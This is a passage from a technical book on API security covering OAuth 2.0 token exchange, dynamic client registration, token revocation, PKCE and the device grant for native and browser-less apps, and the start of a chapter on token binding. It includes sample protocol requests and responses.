this API wants to talk to another Chapter 9 Oauth 2.0 prOfiles 216 protected API to form the response to the client, the first API must authenticate to the second API. When it does so, the first API can’t just pass the access token it received initially from the client. That will fail the audience restriction validation at the second API. The Chain Grant Type OAuth 2.0 profile defines a standard way to address this concern. According to the OAuth Chain Grant Type profile, the API hosted in the first resource server must talk to the authorization server and exchange the OAuth access token it received from the client for a new one that can be used to talk to the other API hosted in the second resource server. Note the Chain Grant type for Oauth 2.0 profile is available at https:// datatracker.ietf.org/doc/draft-hunt-oauth-chain. The chain grant type request must be generated from the first resource server to the authorization server. The value of the grant type must be set to http://oauth. net/grant_type/chain and should include the OAuth access token received from the client. The scope parameter should express the required scopes for the second resource in space-delimited strings. Ideally, the scope should be the same as or a subset of the scopes associated with the original access token. If there is any difference, then the authorization server can decide whether to issue an access token or not. This decision can be based on an out-of-band agreement with the resource owner: POST /token HTTP/1.1 Host: authz.server.net Content-Type: application/x-www-form-urlencoded grant_type=http://oauth.net/grant_type/chain oauth_token=dsddDLJkuiiuieqjhk238khjh scope=read This returns the following JSON response. The response includes an access token with a limited lifetime, but it should not have a refresh token. To get a new access token, the first resource server once again must present the original access token: HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 Cache-Control: no-store Chapter 9 Oauth 2.0 prOfiles 217 Pragma: no-cache { "access_token":"2YotnFZFEjr1zCsicMWpAA", "token_type":"Bearer", "expires_in":1800, } The first resource server can use the access token from this response to talk to the second resource server. Then the second resource server talks to the authorization server to validate the access token (see Figure 9-2). Figure 9-2. OAuth 2.0 Token Exchange We talked about the chain grant type in the first edition of the book as well. But since then this specification didn’t make any progress. If you are using the chain grant type already, you should migrate to the OAuth 2.0 Token Exchange specification, which is still at the draft stage, but closer to being an RFC. In the next section, we talk about OAuth 2.0 Token Exchange draft RFC. Token Exchange The OAuth 2.0 Token Exchange is a draft proposal discussed under the IETF working group at the moment. It solves a similar problem, which was addressed by the Chain Grant Type proposal we discussed in the previous section, with some improvements. Like in the chain grant type, when the first resource server receives an access token Chapter 9 Oauth 2.0 prOfiles 218 from the client application, and when it wants to talk to another resource server, the first resource server generates the following request to talk to the authorization server—and exchanges the access token it got from the client application to a new one. POST /token HTTP/1.1 Host: authz.server.net Content-Type: application/x-www-form-urlencoded grant_type=urn:ietf:params:oauth:grant-type:token-exchange subject_token=dsddDLJkuiiuieqjhk238khjh subject_token_type=urn:ietf:params:oauth:token-type:access_token requested_token_type=urn:ietf:params:oauth:token-type:access_token resource=https://bar.example.com scope=read The preceding sample request does not include all possible parameters. Let’s have a look at the key parameters that you could expect in a token exchange request: • grant_type: Indicates to the token endpoint that, this is a request related to token exchange and must carry the value urn:ietf:params:oauth:grant-type:token-exchange. This is a required parameter. • resource: The value of this parameter carries a reference to the target resource. For example, if the initial request comes to foo API, and it wants to talk to the bar API, then the value of the resource parameter carries the endpoint of the bar API. This is also quite useful in a microservices deployment, where one microservice has to authenticate to another microservice. The OAuth 2.0 authorization server can enforce access control policies against this request to check whether the foo API can access the bar API. This is an optional parameter. • audience: The value of this parameter serves the same purpose as the resource parameter, but in this case the value of the audience parameter is a reference of the target resource, not an absolute URL. If you intend to use the same token against multiple target resources, you can include a list of audience values under the audience parameter. This is an optional parameter. Chapter 9 Oauth 2.0 prOfiles 219 • scope: Indicates the scope values with respect to the new token. This parameter can carry a list of space-delimited, case-sensitive strings. This is an optional parameter. • requested_token_type: Indicates the type of request token, which can be any of urn:ietf:params:oauth:token- type:access_token, urn:ietf:params:oauth:token- type:refresh_token, urn:ietf: params:oauth:token-type:id_token, urn:ietf:params:oauth: token-type:saml1, and urn:ietf:params:oauth:token-type: saml2. This is an optional parameter, and if it is missing, the token endpoint can decide the type of the token to return. If you use a different token type, which is not in the above list, then you can have your own URI as the requested_token_type. • subject_token: Carries the initial token the first API receives. This carries the identity of the entity that initially invokes the first API. This is a required parameter. • subject_token_type: Indicates the type of subject_token, which can be any of urn:ietf:params:oauth:token- type:access_token, urn:ietf:params:oauth:token- type:refresh_token, urn:ietf:params:oauth:token-type:id_ token, urn:ietf:params:oauth:token-type:saml1, and urn:ietf:params:oauth:token-type:saml2. This is a required parameter. If you use a different token type, which is not in the above list, then you can have your own URI as the subject_token_type. • actor_token: Carries a security token, which represents the identity of the entity that intends to use the requested token. In our case, when foo API wants to talk to the bar API, actor_token represents the foo API. This is an optional parameter. • actor_token_type: Indicates the type of actor_token, which can be any of urn:ietf:params:oauth:token- type:access_token, urn:ietf:params:oauth:token- type:refresh_token, urn:ietf:params:oauth:token-type:id_ token, urn:ietf:params:oauth:token-type:saml1, and urn:ietf:params:oauth:token-type:saml2. This is a required Chapter 9 Oauth 2.0 prOfiles 220 parameter when the actor_token is present in the request. If you use a different token type, which is not in the above list, then you can have your own URI as the actor_token_type. The preceding request returns the following JSON response. The access_token parameter in the response carries the requested token, while the issued_token_type indicates its type. The other parameters in the response, token_type, expires_in, scope, and refresh_token, carry the same meaning as in a typical OAuth 2.0 token response, which we discussed in Chapter 4. HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-cache, no-store { "access_token":"eyJhbGciOiJFUzI1NiIsImtpZCI6IjllciJ9 ", "issued_token_type": "urn:ietf:params:oauth:token-type:access_token", "token_type":"Bearer", "expires_in":60 } Dynamic Client Registration Profile According to the OAuth 2.0 core specification, all OAuth clients must be registered with the OAuth authorization server and obtain a client identifier before any interactions. The aim of the Dynamic Client Registration OAuth 2.0 profile2 is to expose an endpoint for client registration in a standard manner to facilitate on-the-fly registrations. The dynamic registration endpoint exposed by the authorization server can be secured or not. If it’s secured, it can be secured with OAuth, HTTP Basic authentication, Mutual Transport Layer Security (mTLS), or any other security protocol as desired by the authorization server. The Dynamic Client Registration profile doesn’t enforce any authentication protocols over the registration endpoint, but it must be secured with TLS. If the authorization server decides that it should allow the endpoint to be public and let anyone be registered, it can do so. For the registration, the client application must pass all its metadata to the registration endpoint: 2 https://tools.ietf.org/html/rfc7591 Chapter 9 Oauth 2.0 prOfiles 221 POST /register HTTP/1.1 Content-Type: application/json Accept: application/json Host: authz.server.com { "redirect_uris":["https://client.org/callback","https://client.org/ callback2"], "token_endpoint_auth_method":"client_secret_basic", "grant_types": ["authorization_code" , "implicit"], "response_types": ["code" , "token"], } Let’s examine the definition of some of the important parameters in the client registration request: • redirect_uris: An array of URIs under the control of the client. The user is redirected to one of these redirect_uris after the authorization grant. These redirect URIs must be over Transport Layer Security (TLS). • token_endpoint_auth_method: The supported authentication scheme when talking to the token endpoint. If the value is client_ secret_basic, the client sends its client ID and the client secret in the HTTP Basic Authorization header. If it’s client_secret_post, the client ID and the client secret are in the HTTP POST body. If the value is none, the client doesn’t want to authenticate, which means it’s a public client (as in the case of the OAuth implicit grant type or when you use authorization code grant type with a single- page application). Even though this RFC only supports three client authentication methods, the other OAuth profiles can introduce their own. For example, OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens, a draft RFC which is being discussed under the IETF OAuth working group at the moment, introduces a new authentication method called tls_client_auth. This indicates that client authentication to the token endpoint happens with mutual TLS. Chapter 9 Oauth 2.0 prOfiles 222 • grant_types: An array of grant types supported by the client. It is always better to limit your client application only to use the grant types it needs and no more. For example, if your client application is a single-page application, then you must only use authorization_ code grant type. • response_types: An array of expected response types from the authorization server. In most of the cases, there is a correlation between the grant_types and response_types—and if you pick something inconsistent, the authorization server will reject the registration request. • client_name: A human-readable name that represents the client application. The authorization server will display the client name to the end users during the login flow. This must be informative enough so that the end users will be able to figure out the client application, during the login flow. • client_uri: A URL that points to the client application. The authorization server will display this URL to the end users, during the login flow in a clickable manner. • logo_uri: A URL pointing to the logo of the client application. The authorization server will display the logo to the end users, during the login flow. • scope: A string containing a space-separated list of scope values where the client intends to request from the authorization server. • contacts: A list of representatives from the client application end. • tos_uri: A URL pointing to the terms of service document of the client application. The authorization server will display this link to the end users, during the login flow. • policy_uri: A URL pointing to the privacy policy document of the client application. The authorization server will display this link to the end users, during the login flow. Chapter 9 Oauth 2.0 prOfiles 223 • jwks_uri: Points to the endpoint, which carries the JSON Web Key (JWK) Set document with the client’s public key. Authorization server uses this public key to validate the signature of any of the requests signed by the client application. If the client application cannot host its public key via an endpoint, it can share the JWKS document under the parameter jwks instead of jwks_uri. Both the parameters must not be present in a single request. • software_id: This is similar to client_id, but there is a major difference. The client_id is generated by the authorization server and mostly used to identify the application. But the client_id can change during the lifetime of an application. In contrast, the software_id is unique to the application across its lifecycle and uniquely represents all the metadata associated with it throughout the application lifecycle. • software_version: The version of the client application, identified by the software_id. • software_statement: This is a special parameter in the registration request, which carries a JSON Web Token (JWT). This JWT includes all the metadata defined earlier with respect to the client. In case the same parameter is defined in JWT and also in the request outside the software_statement parameter, then the parameter within the software_statement will take the precedence. Based on the policies of the authorization server, it can decide whether it should proceed with the registration or not. Even if it decides to go ahead with the registration, the authorization server need not accept all the suggested parameters from the client. For example, the client may suggest using both authorization_code and implicit as grant types, but the authorization server can decide what to allow. The same is true for the token_endpoint_auth_method: the authorization server can decide what to support. The following is a sample response from the authorization server: HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store Pragma: no-cache Chapter 9 Oauth 2.0 prOfiles 224 { "client_id":"iuyiSgfgfhffgfh", "client_secret":"hkjhkiiu89hknhkjhuyjhk", "client_id_issued_at":2343276600, "client_secret_expires_at":2503286900, "redirect_uris":["https://client.org/callback","https://client.org/callback2"], "grant_types":"authorization_code", "token_endpoint_auth_method":"client_secret_basic", } Let’s examine the definition of each parameter: • client_id: The generated unique identifier for the client. • client_secret: The generated client secret corresponding to the client_id. This is optional. For example, for public clients the client_secret isn’t required. • client_id_issued_at: The number of seconds since January 1, 1970. • client_secret_expires_at: The number of seconds since January 1, 1970 or 0 if it does not expire. • redirect_uris: Accepted redirect_uris. • token_endpoint_auth_method: The accepted authentication method for the token endpoint. Note the Dynamic Client registration Oauth 2.0 profile is quite useful in mobile applications. Mobile client applications secured with Oauth have the client iD and the client secret baked into the application. these are the same for all the installations of a given application. if a given client secret is compromised, that will affect all the installations, and rogue client applications can be developed using the stolen keys. these rogue client applications can generate more traffic on the server and exceed the legitimate throttling limit, hence causing a denial of service attack. With dynamic client registration, you need not set the same client iD and client secret for all the installations of a give application. During the installation process, the application can talk to the authorization server’s registration endpoint and generate a client iD and a client secret per installation. Chapter 9 Oauth 2.0 prOfiles 225 Token Revocation Profile Two parties can perform OAuth token revocation. The resource owner should be able to revoke an access token issued to a client, and the client should be able to revoke an access token or a refresh token it has acquired. The Token Revocation OAuth 2.0 profile3 addresses the latter. It introduces a standard token-revoke endpoint at the authorization server end. To revoke an access token or a refresh token, the client must notify the revoke endpoint. Note in October 2013, there was an attack against Buffer (a social media management service that can be used to cross-post between facebook, twitter, etc.). Buffer was using Oauth to access user profiles in facebook and twitter. Once Buffer detected that it was under attack, it revoked all its access keys from facebook, twitter, and other social media sites, which prevented attackers from getting access to users’ facebook and twitter accounts. The client must initiate the token revocation request. The client can authenticate to the authorization server via HTTP Basic authentication (with its client ID and client secret), with mutual TLS or with any other authentication mechanism proposed by the authorization server and then talk to the revoke endpoint. The request should consist of either the access token or the refresh token and then a token_type_hint that informs the authorization server about the type of the token (access_token or refresh_token). This parameter may not be required, but the authorization server can optimize its search criteria using it. Here is a sample request: POST /revoke HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded Authorization: Basic czZCaGRSdadsdI9iuiaHk99kjkh token=dsd0lkjkkljkkllkdsdds&token_type_hint=access_token 3 https://tools.ietf.org/html/rfc7009 Chapter 9 Oauth 2.0 prOfiles 226 In response to this request, the authorization server first must validate the client credentials and then proceed with the token revocation. If the token is a refresh token, the authorization server must invalidate all the access tokens issued for the authorization grant associated with that refresh token. If it’s an access token, it’s up to the authorization server to decide whether to revoke the refresh token or not. In most cases, it’s ideal to revoke the refresh token, too. Once the token revocation is completed successfully, the authorization server must send an HTTP 200 status code back to the client. Summary • The OAuth 2.0 profiles built on top of the core framework build a security ecosystem to make OAuth 2.0 ready for enterprise grade deployments. • OAuth 2.0 introduced two extension points via grant types and token types. • The Token Introspection profile for OAuth 2.0 introduces a standard API at the authorization server, allowing the resource server to talk to it and retrieve token metadata. • According to the OAuth Chain Grant Type profile, the API hosted in the first resource server must talk to the authorization server and exchange the OAuth access token it received from the client for a new one that can be used to talk to another API hosted in a second resource server. • The OAuth 2.0 Token Exchange is a draft proposal discussed under the IETF working group at the moment, which solves a similar problem as the Chain Grant Type proposal with some improvements. • The aim of the Dynamic Client Registration OAuth 2.0 profile is to expose an endpoint for client registration in a standard manner to facilitate on-the-fly registrations. • The Token Revocation OAuth 2.0 profile introduces a standard token- revoke endpoint at the authorization server to revoke an access token or a refresh token by the client. Chapter 9 Oauth 2.0 prOfiles 227 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_10 CHAPTER 10 Accessing APIs via Native Mobile Apps The adoption of native mobile apps has increased heavily in the last few years. Within the first decade of the 21st century, the Internet users worldwide increased from 350 million to more than 2 billion and mobile phone subscribers from 750 million to 5 billion—and today it hits 6 billion, where the world population is around 7 billion. Most of the mobile devices out there–even the cheapest ones—could be used to access the Internet. We treat a native mobile application as an untrusted or a public client. A client application, which is not capable of protecting its own keys or credentials, is identified as a public client under OAuth terminology. Since the native mobile apps run on a device owned by the user, the user who is having complete access to the mobile device can figure out any keys the application hides. This is a hard challenge we face in accessing secured APIs from a native mobile application. In this chapter, we discuss the best practices in using OAuth 2.0 for native apps, Proof Key for Code Exchange (PKCE), which is an approach for protecting native apps from code interception attack and protecting native apps in a browser-less environment. Mobile Single Sign-On (SSO) It takes an average of 20 seconds for a user to log in to an application. Not having to enter a password each time a user needs to access a resource saves time and makes users more productive and also reduces the frustration of multiple login events and forgotten passwords. When we have single sign-on, the users will only have one password to remember and update and only one set of password rules to remember. Their initial login provides them with access to all the resources, typically for the entire day or the week. 228 If you provide multiple mobile applications for your corporate employees to access from their mobile devices, it’s a pain to ask them to re-login to each application independently. Possibly all of them may be sharing the same credential store. This is analogous to a case where Facebook users log in to multiple third-party mobile applications with their Facebook credentials. With Facebook login, you only login once to Facebook and will automatically log into the other applications rely on Facebook login. In mobile world, login to native apps is done in three different ways: directly asking for user credentials, using a WebView, and using the system browser. Login with Direct Credentials With this approach, the user directly provides the credentials to the native app itself (see Figure 10-1). And the app will use an API (or OAuth 2.0 password grant type) to authenticate the user. This approach assumes the native app is trusted. In case your native app uses a third-party identity provider for login, we must not use this. Even this approach may not be possible, unless the third-party identity provider provides a login API or supports OAuth 2.0 password grant type. Also this approach can make the users vulnerable for phishing attacks. An attacker can plant a phishing attack by fooling the user to install a native app with the same look and feel as the original app and then mislead the user to share his or her credentials with it. In addition to this risk, login with direct credentials does not help in building a single sign-on experience, when you have multiple native apps. You need to use your credentials to log in to each individual application. Chapter 10 aCCessing apis via native Mobile apps 229 Login with WebView The native app developers use a WebView in a native app to embed the browser, so that the app can use web technologies such as HTML, JavaScript, and CSS. During the login flow, the native app loads the system browser into a WebView and uses HTTP redirects to get the user to the corresponding identity provider. For example, if you want to authenticate users with Facebook, to your native app, you load the system browser into a WebView first and then redirect the user to Facebook. What’s happening in the browser loaded into the WebView is no different from the flow you see when you log in to a web app via Facebook using a browser. The WebView-based approach was popular in building hybrid native apps, because it provides better user experience. The users won’t notice the browser being loaded into the WebView. It looks like everything happens in the same native app. Figure 10-1. The Chase bank’s mobile app, which users directly provide credentials for login Chapter 10 aCCessing apis via native Mobile apps 230 It also has some major disadvantages. The web session under the browser loaded into a WebView of a native app is not shared between multiple native apps. For example, if you do login with Facebook to one native app, by redirecting the user to facebook.com via a browser loaded into a WebView, the user has to log in to Facebook again and again, when multiple native apps follow the same approach. That is because the web session created under facebook.com in one WebView is not shared with another WebView of a different native app. So the single sign-on (SSO) between native apps will not work with the WebView approach. WebView-based native apps also make the users more vulnerable to phishing attacks. In the same example we discussed before, when a user gets redirected to facebook.com via the system browser loaded into a WebView, he or she won’t be able to figure out whether they are visiting something outside the native app. So, the native app developer can trick the user by presenting something very similar to facebook.com and steal user’s Facebook credentials. Due to this reason, most of the developers are now moving away from using a WebView for login. Login with a System Browser This approach for login into a native app is similar to what we discussed in the previous section, but instead of the WebView, the native app spins up the system browser (see Figure 10-2). System browser itself is another native app. User experience in this approach is not as smooth as with the WebView approach, as the user has to switch between two native apps during the login process, but in terms of security, this is the best approach. Also, this is the only approach we can have single sign-on experience in a mobile environment. Unlike WebView approach, when you use the system browser, it manages a single web session for the user. Say, for example, when there are multiple native apps using Facebook login via the same system browser, the users only need to log in to Facebook once. Once a web session is created under facebook.com domain with the system browser, for the subsequent login requests from other native apps, users will be logged in automatically. In the next section, we see how we can use OAuth 2.0 securely to build this use case. Chapter 10 aCCessing apis via native Mobile apps 231 Using OAuth 2.0 in Native Mobile Apps OAuth 2.0 has become the de facto standard for mobile application authentication. In our security design, we need to treat a native app a dumb application. It is very much similar to a single-page application. The following lists out the sequence of events that happen in using OAuth 2.0 to log in to a native mobile app. Figure 10-2. Login to Foursquare native app using Facebook Chapter 10 aCCessing apis via native Mobile apps 232 1. Mobile app developer has to register the application with the corresponding identity provider or the OAuth 2.0 authorization server and obtain a client_id. The recommendation is to use OAuth 2.0 authorization code grant type, without a client secret. Since the native app is an untrusted client, there is no point of having a client secret. Some were using implicit grant type for native apps, but it has its own inherent security issues and not recommended any more. 2. Instead of WebView, use SFSafariViewController with iOS9+ or Chrome Custom Tabs for Android. This web controller provides all the benefits of the native system browser in a control that can be placed within an application. Then you can embed the client_id obtained from step 1 into the application. When you embed a client_id into an app, it will be the same for all the instances of that native app. If you want to differentiate each instance of the app (installed in different devices), then we can dynamically generate a client_id for each instance at the start of the app, following the protocol defined in OAuth 2.0 Dynamic Client Registration profile, which we explained in detail in Chapter 9. Figure 10-3. A typical login flow for a native mobile app with OAuth 2.0 Chapter 10 aCCessing apis via native Mobile apps 233 3. During the installation of the app, we need to register an app- specific custom URL scheme with the mobile operating system. This URL scheme must match the callback URL or redirect URI you used in step 1, at the time of app registration. A custom URL scheme lets the mobile operating system to pass back the control to your app from another external application, for example from the system browser. If you send some parameters to the app-specific custom URI scheme on the browser, the mobile operating system will track that and invoke the corresponding native app with those parameters. 4. Once the user clicks login, on the native app, we need to spin up the system browser and follow the protocol defined in OAuth 2.0 authorization code grant type (see Figure 10-3), which we discussed in detail in Chapter 4. 5. After the user authenticates to the identity provider, the browser redirects the user back to the registered redirect URI, which is in fact a custom URL scheme registered with the mobile operating system. 6. Upon receiving the authorization code to the custom URL scheme on the system browser, the mobile operating system spins up the corresponding native app and passes over the control. 7. The native app will talk to the token endpoint of the authorization server and exchange the authorization code to an access token. 8. The native app uses the access token to access APIs. Inter-app Communication The system browser itself is another native app. We used a custom URL scheme as a way of inter-app communication to receive the authorization code from the authorization server. There are multiple ways for inter-app communication available in a mobile environment: private-use URI scheme (also known as custom URL scheme), claimed HTTPS URL scheme, and loopback URI scheme. Chapter 10 aCCessing apis via native Mobile apps 234 Private URI Schemes In the previous section, we already discussed how a private URI scheme works. When the browser hits with a private URI scheme, it invokes the corresponding native app, registered for that URI scheme, and hands over the control. The RFC 75951 defines guidelines and registration procedures for URI schemes, and according to that, it is recommended to use a domain name that is under your control, in its reverse order as the private URI scheme. For example, if you own app.foo.com, then the private URI scheme should be com.foo.app. The complete private URI scheme may look like com.foo.app:/oauth2/redirect, and there is only one slash that appears right after the scheme component. In the same mobile environment, the private URI schemes can collide with each other. For example, there can be two apps registered for the same URI scheme. Ideally, this should not happen if you follow the convention we discussed before while choosing an identifier. But still there is an opportunity that an attacker can use this technique to carry out a code interception attack. To prevent such attacks, we must use Proof Key for Code Exchange (PKCE) along with private URI schemes. We discuss PKCE in a later section. Claimed HTTPS URI Scheme Just like the private URI scheme, which we discussed in the previous section, when a browser sees a claimed HTTPS URI scheme, instead of loading the corresponding page, it hands over the control to the corresponding native app. In supported mobile operating systems, you can claim an HTTPS domain, which you have control. The complete claimed HTTPS URI scheme may look like https://app.foo.com/oauth2/redirect. Unlike in private URI scheme, the browser verifies the identity of the claimed HTTPS URI before redirection, and for the same reason, it is recommended to use claimed HTTPS URI scheme over others where possible. Loopback Interface With this approach, your native app will listen on a given port in the device itself. In other words, your native app acts as a simple web server. For example, your redirect URI will look like http://127.0.0.1:5000/oauth2/redirect. Since we are using the 1 https://tools.ietf.org/html/rfc7595#section-3.8 Chapter 10 aCCessing apis via native Mobile apps 235 loopback interface (127.0.0.1), when the browser sees this URL, it will hand over the control to the service listening on the mobile device on port 5000. The challenge with this approach is that your app may not be able to run on the same port on all the devices, if there are any other apps on the mobile device already using the same port. Proof Key for Code Exchange (PKCE) Proof Key for Code Exchange (PKCE) is defined in the RFC 7636 as a way to mitigate code interception attack (more details in Chapter 14) in a mobile environment. As we discussed in the previous section, when you use a custom URL scheme to retrieve the authorization code from the OAuth authorization server, there can be a case where it goes to a different app, which is also registered with the mobile device for the same custom URL scheme as the original app. An attacker can possibly do this with the intention of stealing the code. When the authorization code gets to the wrong app, it can exchange it to an access token and then gets access to the corresponding APIs. Since we use authorization code with no client secret in mobile environments, and the client id of the original app is public, the attacker has no issue in exchanging the code to an access token by talking to the token endpoint of the authorization server. Figure 10-4. A typical login flow for a native mobile app with OAuth 2.0 and PKCE Chapter 10 aCCessing apis via native Mobile apps 236 Let’s see how PKCE solves the code interception attack (see Figure 10-4): 1. The native mobile app, before redirecting the user to the authorization server, generates a random value, which is called the code_verifier. The value of the code_verifier must have a minimum length of 43 characters and a maximum of 128 characters. 2. Next the app has to calculate the SHA256 of the code_verifier and find its base64-url- encoded (see Appendix E) representation, with no padding. Since SHA256 hashing algorithm always results in a hash of 256 bits, when you base64-url-encode it, there will be a padding all the time, which is represented by the = sign. According to the PKCE RFC, we need to remove that padding— and that value, which is the SHA256-hashed, base64-url-encoded, unpadded code_verifier, is known as the code_challenge. 3. Now, when the native app initiates the authorization code request and redirects the user to the authorization server, it has to construct the request URL in the following manner, along with the code_challenge and the code_challenge_method query parameters. The code_challenge_method carries the name of the hashing algorithm. https://idp.foo.com/authorization?client_id=FFGFGOIPI7898778&s copeopenid&redirect_uri=com.foo.app:/oauth2/redirect&response_ type=code&code_challenge=YzfcdAoRg7rAfj9_Fllh7XZ6BBl4PIHC- xoMrfqvWUc&code_challenge_method=S256" 4. At the time of issuing the authorization code, the authorization server must record the provided code_challenge against the issued authorization code. Some authorization servers may embed the code_challenge into the code itself. 5. Once the native app gets the authorization code, it can exchange the code to an access token by talking to the authorization server’s token endpoint. But, when you follow PKCE, you must send the code_verifier (which is corresponding to the code_challenge) along with the token request. Chapter 10 aCCessing apis via native Mobile apps 237 curl -k --user "XDFHKKJURJSHJD" -d "code=XDFHKKJURJSHJD&grant_ type=authorization_code&client_id=FFGFGOIPI7898778 &redirect_uri=com.foo.app:/oauth2/redirect&code_ verifier=ewewewoiuojslkdjsd9sadoidjalskdjsdsdewewewoiuojslkd jsd9sadoidjalskdjsdsd" https://idp.foo.com/token 6. If the attacker’s app gets the authorization code, it still cannot exchange it to an access token, because only the original app knows the code_verifier. 7. Once the authorization server receives the code_verifier along with the token request, it will find the SHA256-hashed, base64-url-encoded, unpadded value of it and compare it with the recorded code_challenge. If those two match, then it will issue the access token. Browser-less Apps So far in this chapter, we only discussed about mobile devices, which are capable of spinning up a web browser. There is another growing requirement to use OAuth secured APIs from applications running on devices with input constraints and no web browser, such as smart TVs, smart speakers, printers, and so on. In this section, we discuss how to access OAuth 2.0 protected APIs from browser-less apps using the OAuth 2.0 device authorization grant. In any case, the device authorization grant does not replace any of the approaches we discussed earlier with respect to native apps running on capable mobile devices. OAuth 2.0 Device Authorization Grant The OAuth 2.0 device authorization grant2 is the RFC 8628, which is published by the IETF OAuth working group. According to this RFC, a device to use the device authorization grant type must satisfy the following requirements: • The device is already connected to the Internet or to the network, which has access to the authorization server. • The device is able to make outbound HTTPS requests. 2 https://tools.ietf.org/html/rfc8628 Chapter 10 aCCessing apis via native Mobile apps 238 • The device is able to display or otherwise communicate a URI and code sequence to the user. • The user has a secondary device (e.g., personal computer or smartphone) from which they can process a request. Let’s see how device authorization grant works, with an example. Say we have a YouTube app running on a smart TV, and we need the smart TV to access our YouTube account on behalf of us. In this case, YouTube acts as both the OAuth authorization server and the resource server, and the YouTube app running on the smart TV is the OAuth client application. 1. The user takes the TV remote and clicks the YouTube app to associate his/her YouTube account with the app. 2. The YouTube app running on the smart TV has an embedded client ID and sends a direct HTTP request over HTTPS to the authorization server. POST /device_authorization HTTP/1.1 Host: idp.youtube.com Content-Type: application/x-www-form-urlencoded client_id=XDFHKKJURJSHJD Figure 10-5. A typical login flow for a browser-less app with OAuth 2.0 Chapter 10 aCCessing apis via native Mobile apps 239 3. In response to the preceding request, the authorization server returns back a device_code, a user_code, and a verification URI. Both the device_code and the user_code have an expiration time associated with them, which is communicated to the client app via expires_in parameter (in seconds). HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store { "device_code": "GmRhmhcxhwAzkoEqiMEg_DnyEysNkuNhszIySk9eS", "user_code": "WDJB-MJHT", "verification_uri": "https://youtube.com/device", "verification_uri_complete": "https://youtube.com/device?user_code=WDJB-MJHT", "expires_in": 1800, "interval": 5 } 4. The YouTube client app instructs the user to visit the provided verification URI (from the preceding response) and confirm the authorization request with the provided user code (from the preceding response). 5. Now the user has to use a secondary device (a laptop or mobile phone) to visit the verification URI. While that action is in progress, the YouTube app will keep polling the authorization server to see whether the user has confirmed the authorization request. The minimum amount of time the client should wait before polling or the time between polling is specified by the authorization server in the preceding response under the interval parameter. The poll request to the token endpoint of the authorization server includes three parameters. The grant_type parameter must carry the value urn:ietf:params:oauth:grant- type:device_code, so the authorization server knows how to Chapter 10 aCCessing apis via native Mobile apps 240 process this request. The device_code parameter carries the device code issued by the authorization server in its first response, and the client_id parameter carries the client identifier of the YouTube app. POST /token HTTP/1.1 Host: idp.youtube.com Content-Type: application/x-www-form-urlencoded grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Adevice_code &device_code=GmRhmhcxhwAzkoEqiMEg_DnyEysNkuNhszIySk9eS &client_id=459691054427 6. The user visits the provided verification URI, enters the user code, and confirms the authorization request. 7. Once the user confirms the authorization request, the authorization server issues the following response to the request in step 5. This is the standard response from an OAuth 2.0 authorization server token endpoint. HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 Cache-Control: no-store Pragma: no-cache { "access_token":"2YotnFZFEjr1zCsicMWpAA", "token_type":"Bearer", "expires_in":3600, "refresh_token":"tGzv3JOkF0XG5Qx2TlKWIA", } 8. Now the YouTube app can use this access token to access the YouTube API on behalf of the user. Chapter 10 aCCessing apis via native Mobile apps 241 Summary • There are multiple grant types in OAuth 2.0; however, while using OAuth 2.0 to access APIs from a native mobile app, it is recommended to use authorization code grant type, along with Proof Key for Code Exchange (PKCE). • PKCE protects the native apps from code interception attack. • The use of browser-less devices such as smart TVs, smart speakers, printers, and so on is gaining popularity. • The OAuth 2.0 device authorization grant defines a standard flow to use OAuth 2.0 from a browser-less device and gain access to APIs. Chapter 10 aCCessing apis via native Mobile apps 243 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_11 CHAPTER 11 OAuth 2.0 Token Binding Most of the OAuth 2.0 deployments do rely upon bearer tokens. A bearer token is like “cash.” If I steal 10 bucks from you, I can use it at a Starbucks to buy a cup of coffee—no questions asked. I do not need to prove that I own the ten-dollar note. Unlike cash, if I use my credit card, I need to prove the possession. I need to prove I own it. I need to sign to authorize the transaction, and it’s validated against the signature on the card. The bearer tokens are like cash—once stolen, an attacker can use it to impersonate the original owner. Credit cards are like proof of possession (PoP) tokens. OAuth 2.0 recommends using Transport Layer Security (TLS) for all the interactions between the client, authorization server, and resource server. This makes the OAuth 2.0 model quite simple with no complex cryptography involved—but at the same time, it carries all the risks associated with a bearer token. There is no second level of defense. Also not everyone is fully bought into the idea of using OAuth 2.0 bearer tokens—just trusting the underlying TLS communication. I’ve met several people—mostly from the financial domain—who are reluctant to use OAuth 2.0, just because of the bearer tokens. An attacker may attempt to eavesdrop authorization code/access token/refresh token (see Chapter 4 for details) in transit from the authorization server to the client, using any of the following means: • Malware installed in the browser (public clients). • Browser history (public clients/URI fragments). • Intercept the TLS communication between the client and the authorization server or the resource server (exploiting the vulnerabilities in the TLS layer like Heartbleed and Logjam). 244 • TLS is point to point (not end to end)—an attacker having access to a proxy server could simply log all the tokens. Also, in many production deployments, the TLS connection is terminated at the edge, and from there onward, it’s either a new TLS connection or a plain HTTP connection. In either case, as soon as a token leaves the channel, it’s no more secure. Understanding Token Binding OAuth 2.0 token binding proposal cryptographically binds security tokens to the TLS layer, preventing token export and replay attacks. It relies on TLS—and since it binds the tokens to the TLS connection itself, anyone who steals a token cannot use it over a different channel. We can break down the token binding protocol into three main phases (see Figure 11-1). Figure 11-1. Three main phases in the token binding protocol Token Binding Negotiation During the negotiation phase, the client and the server negotiate a set of parameters to use for token binding between them. This is independent of the application layer protocols—as it happens during the TLS handshake (see Appendix C). We discuss more about this in the next section. The token binding negotiation is defined in the RFC 8472. Keep in mind we do not negotiate any keys in this phase, only the metadata. Chapter 11 Oauth 2.0 tOken Binding 245 Key Generation During the key generation phase, the client generates a key pair according to the parameters negotiated in the negotiation phase. The client will have a key pair for each host it talks to (in most of the cases). Proof of Possession During the proof of possession phase, the client uses the keys generated in the key generation phase to prove the possession. Once the keys are agreed upon, in the key generation phase, the client proves the possession of the key by signing the exported keying material (EKM) from the TLS connection. The RFC 5705 allows an application to get additional application-specific keying material derived from the TLS master secret (see Appendix C). The RFC 8471 defines the structure of the token binding message, which includes the signature and other key materials, but it does not define how to carry the token binding message from the client to the server. 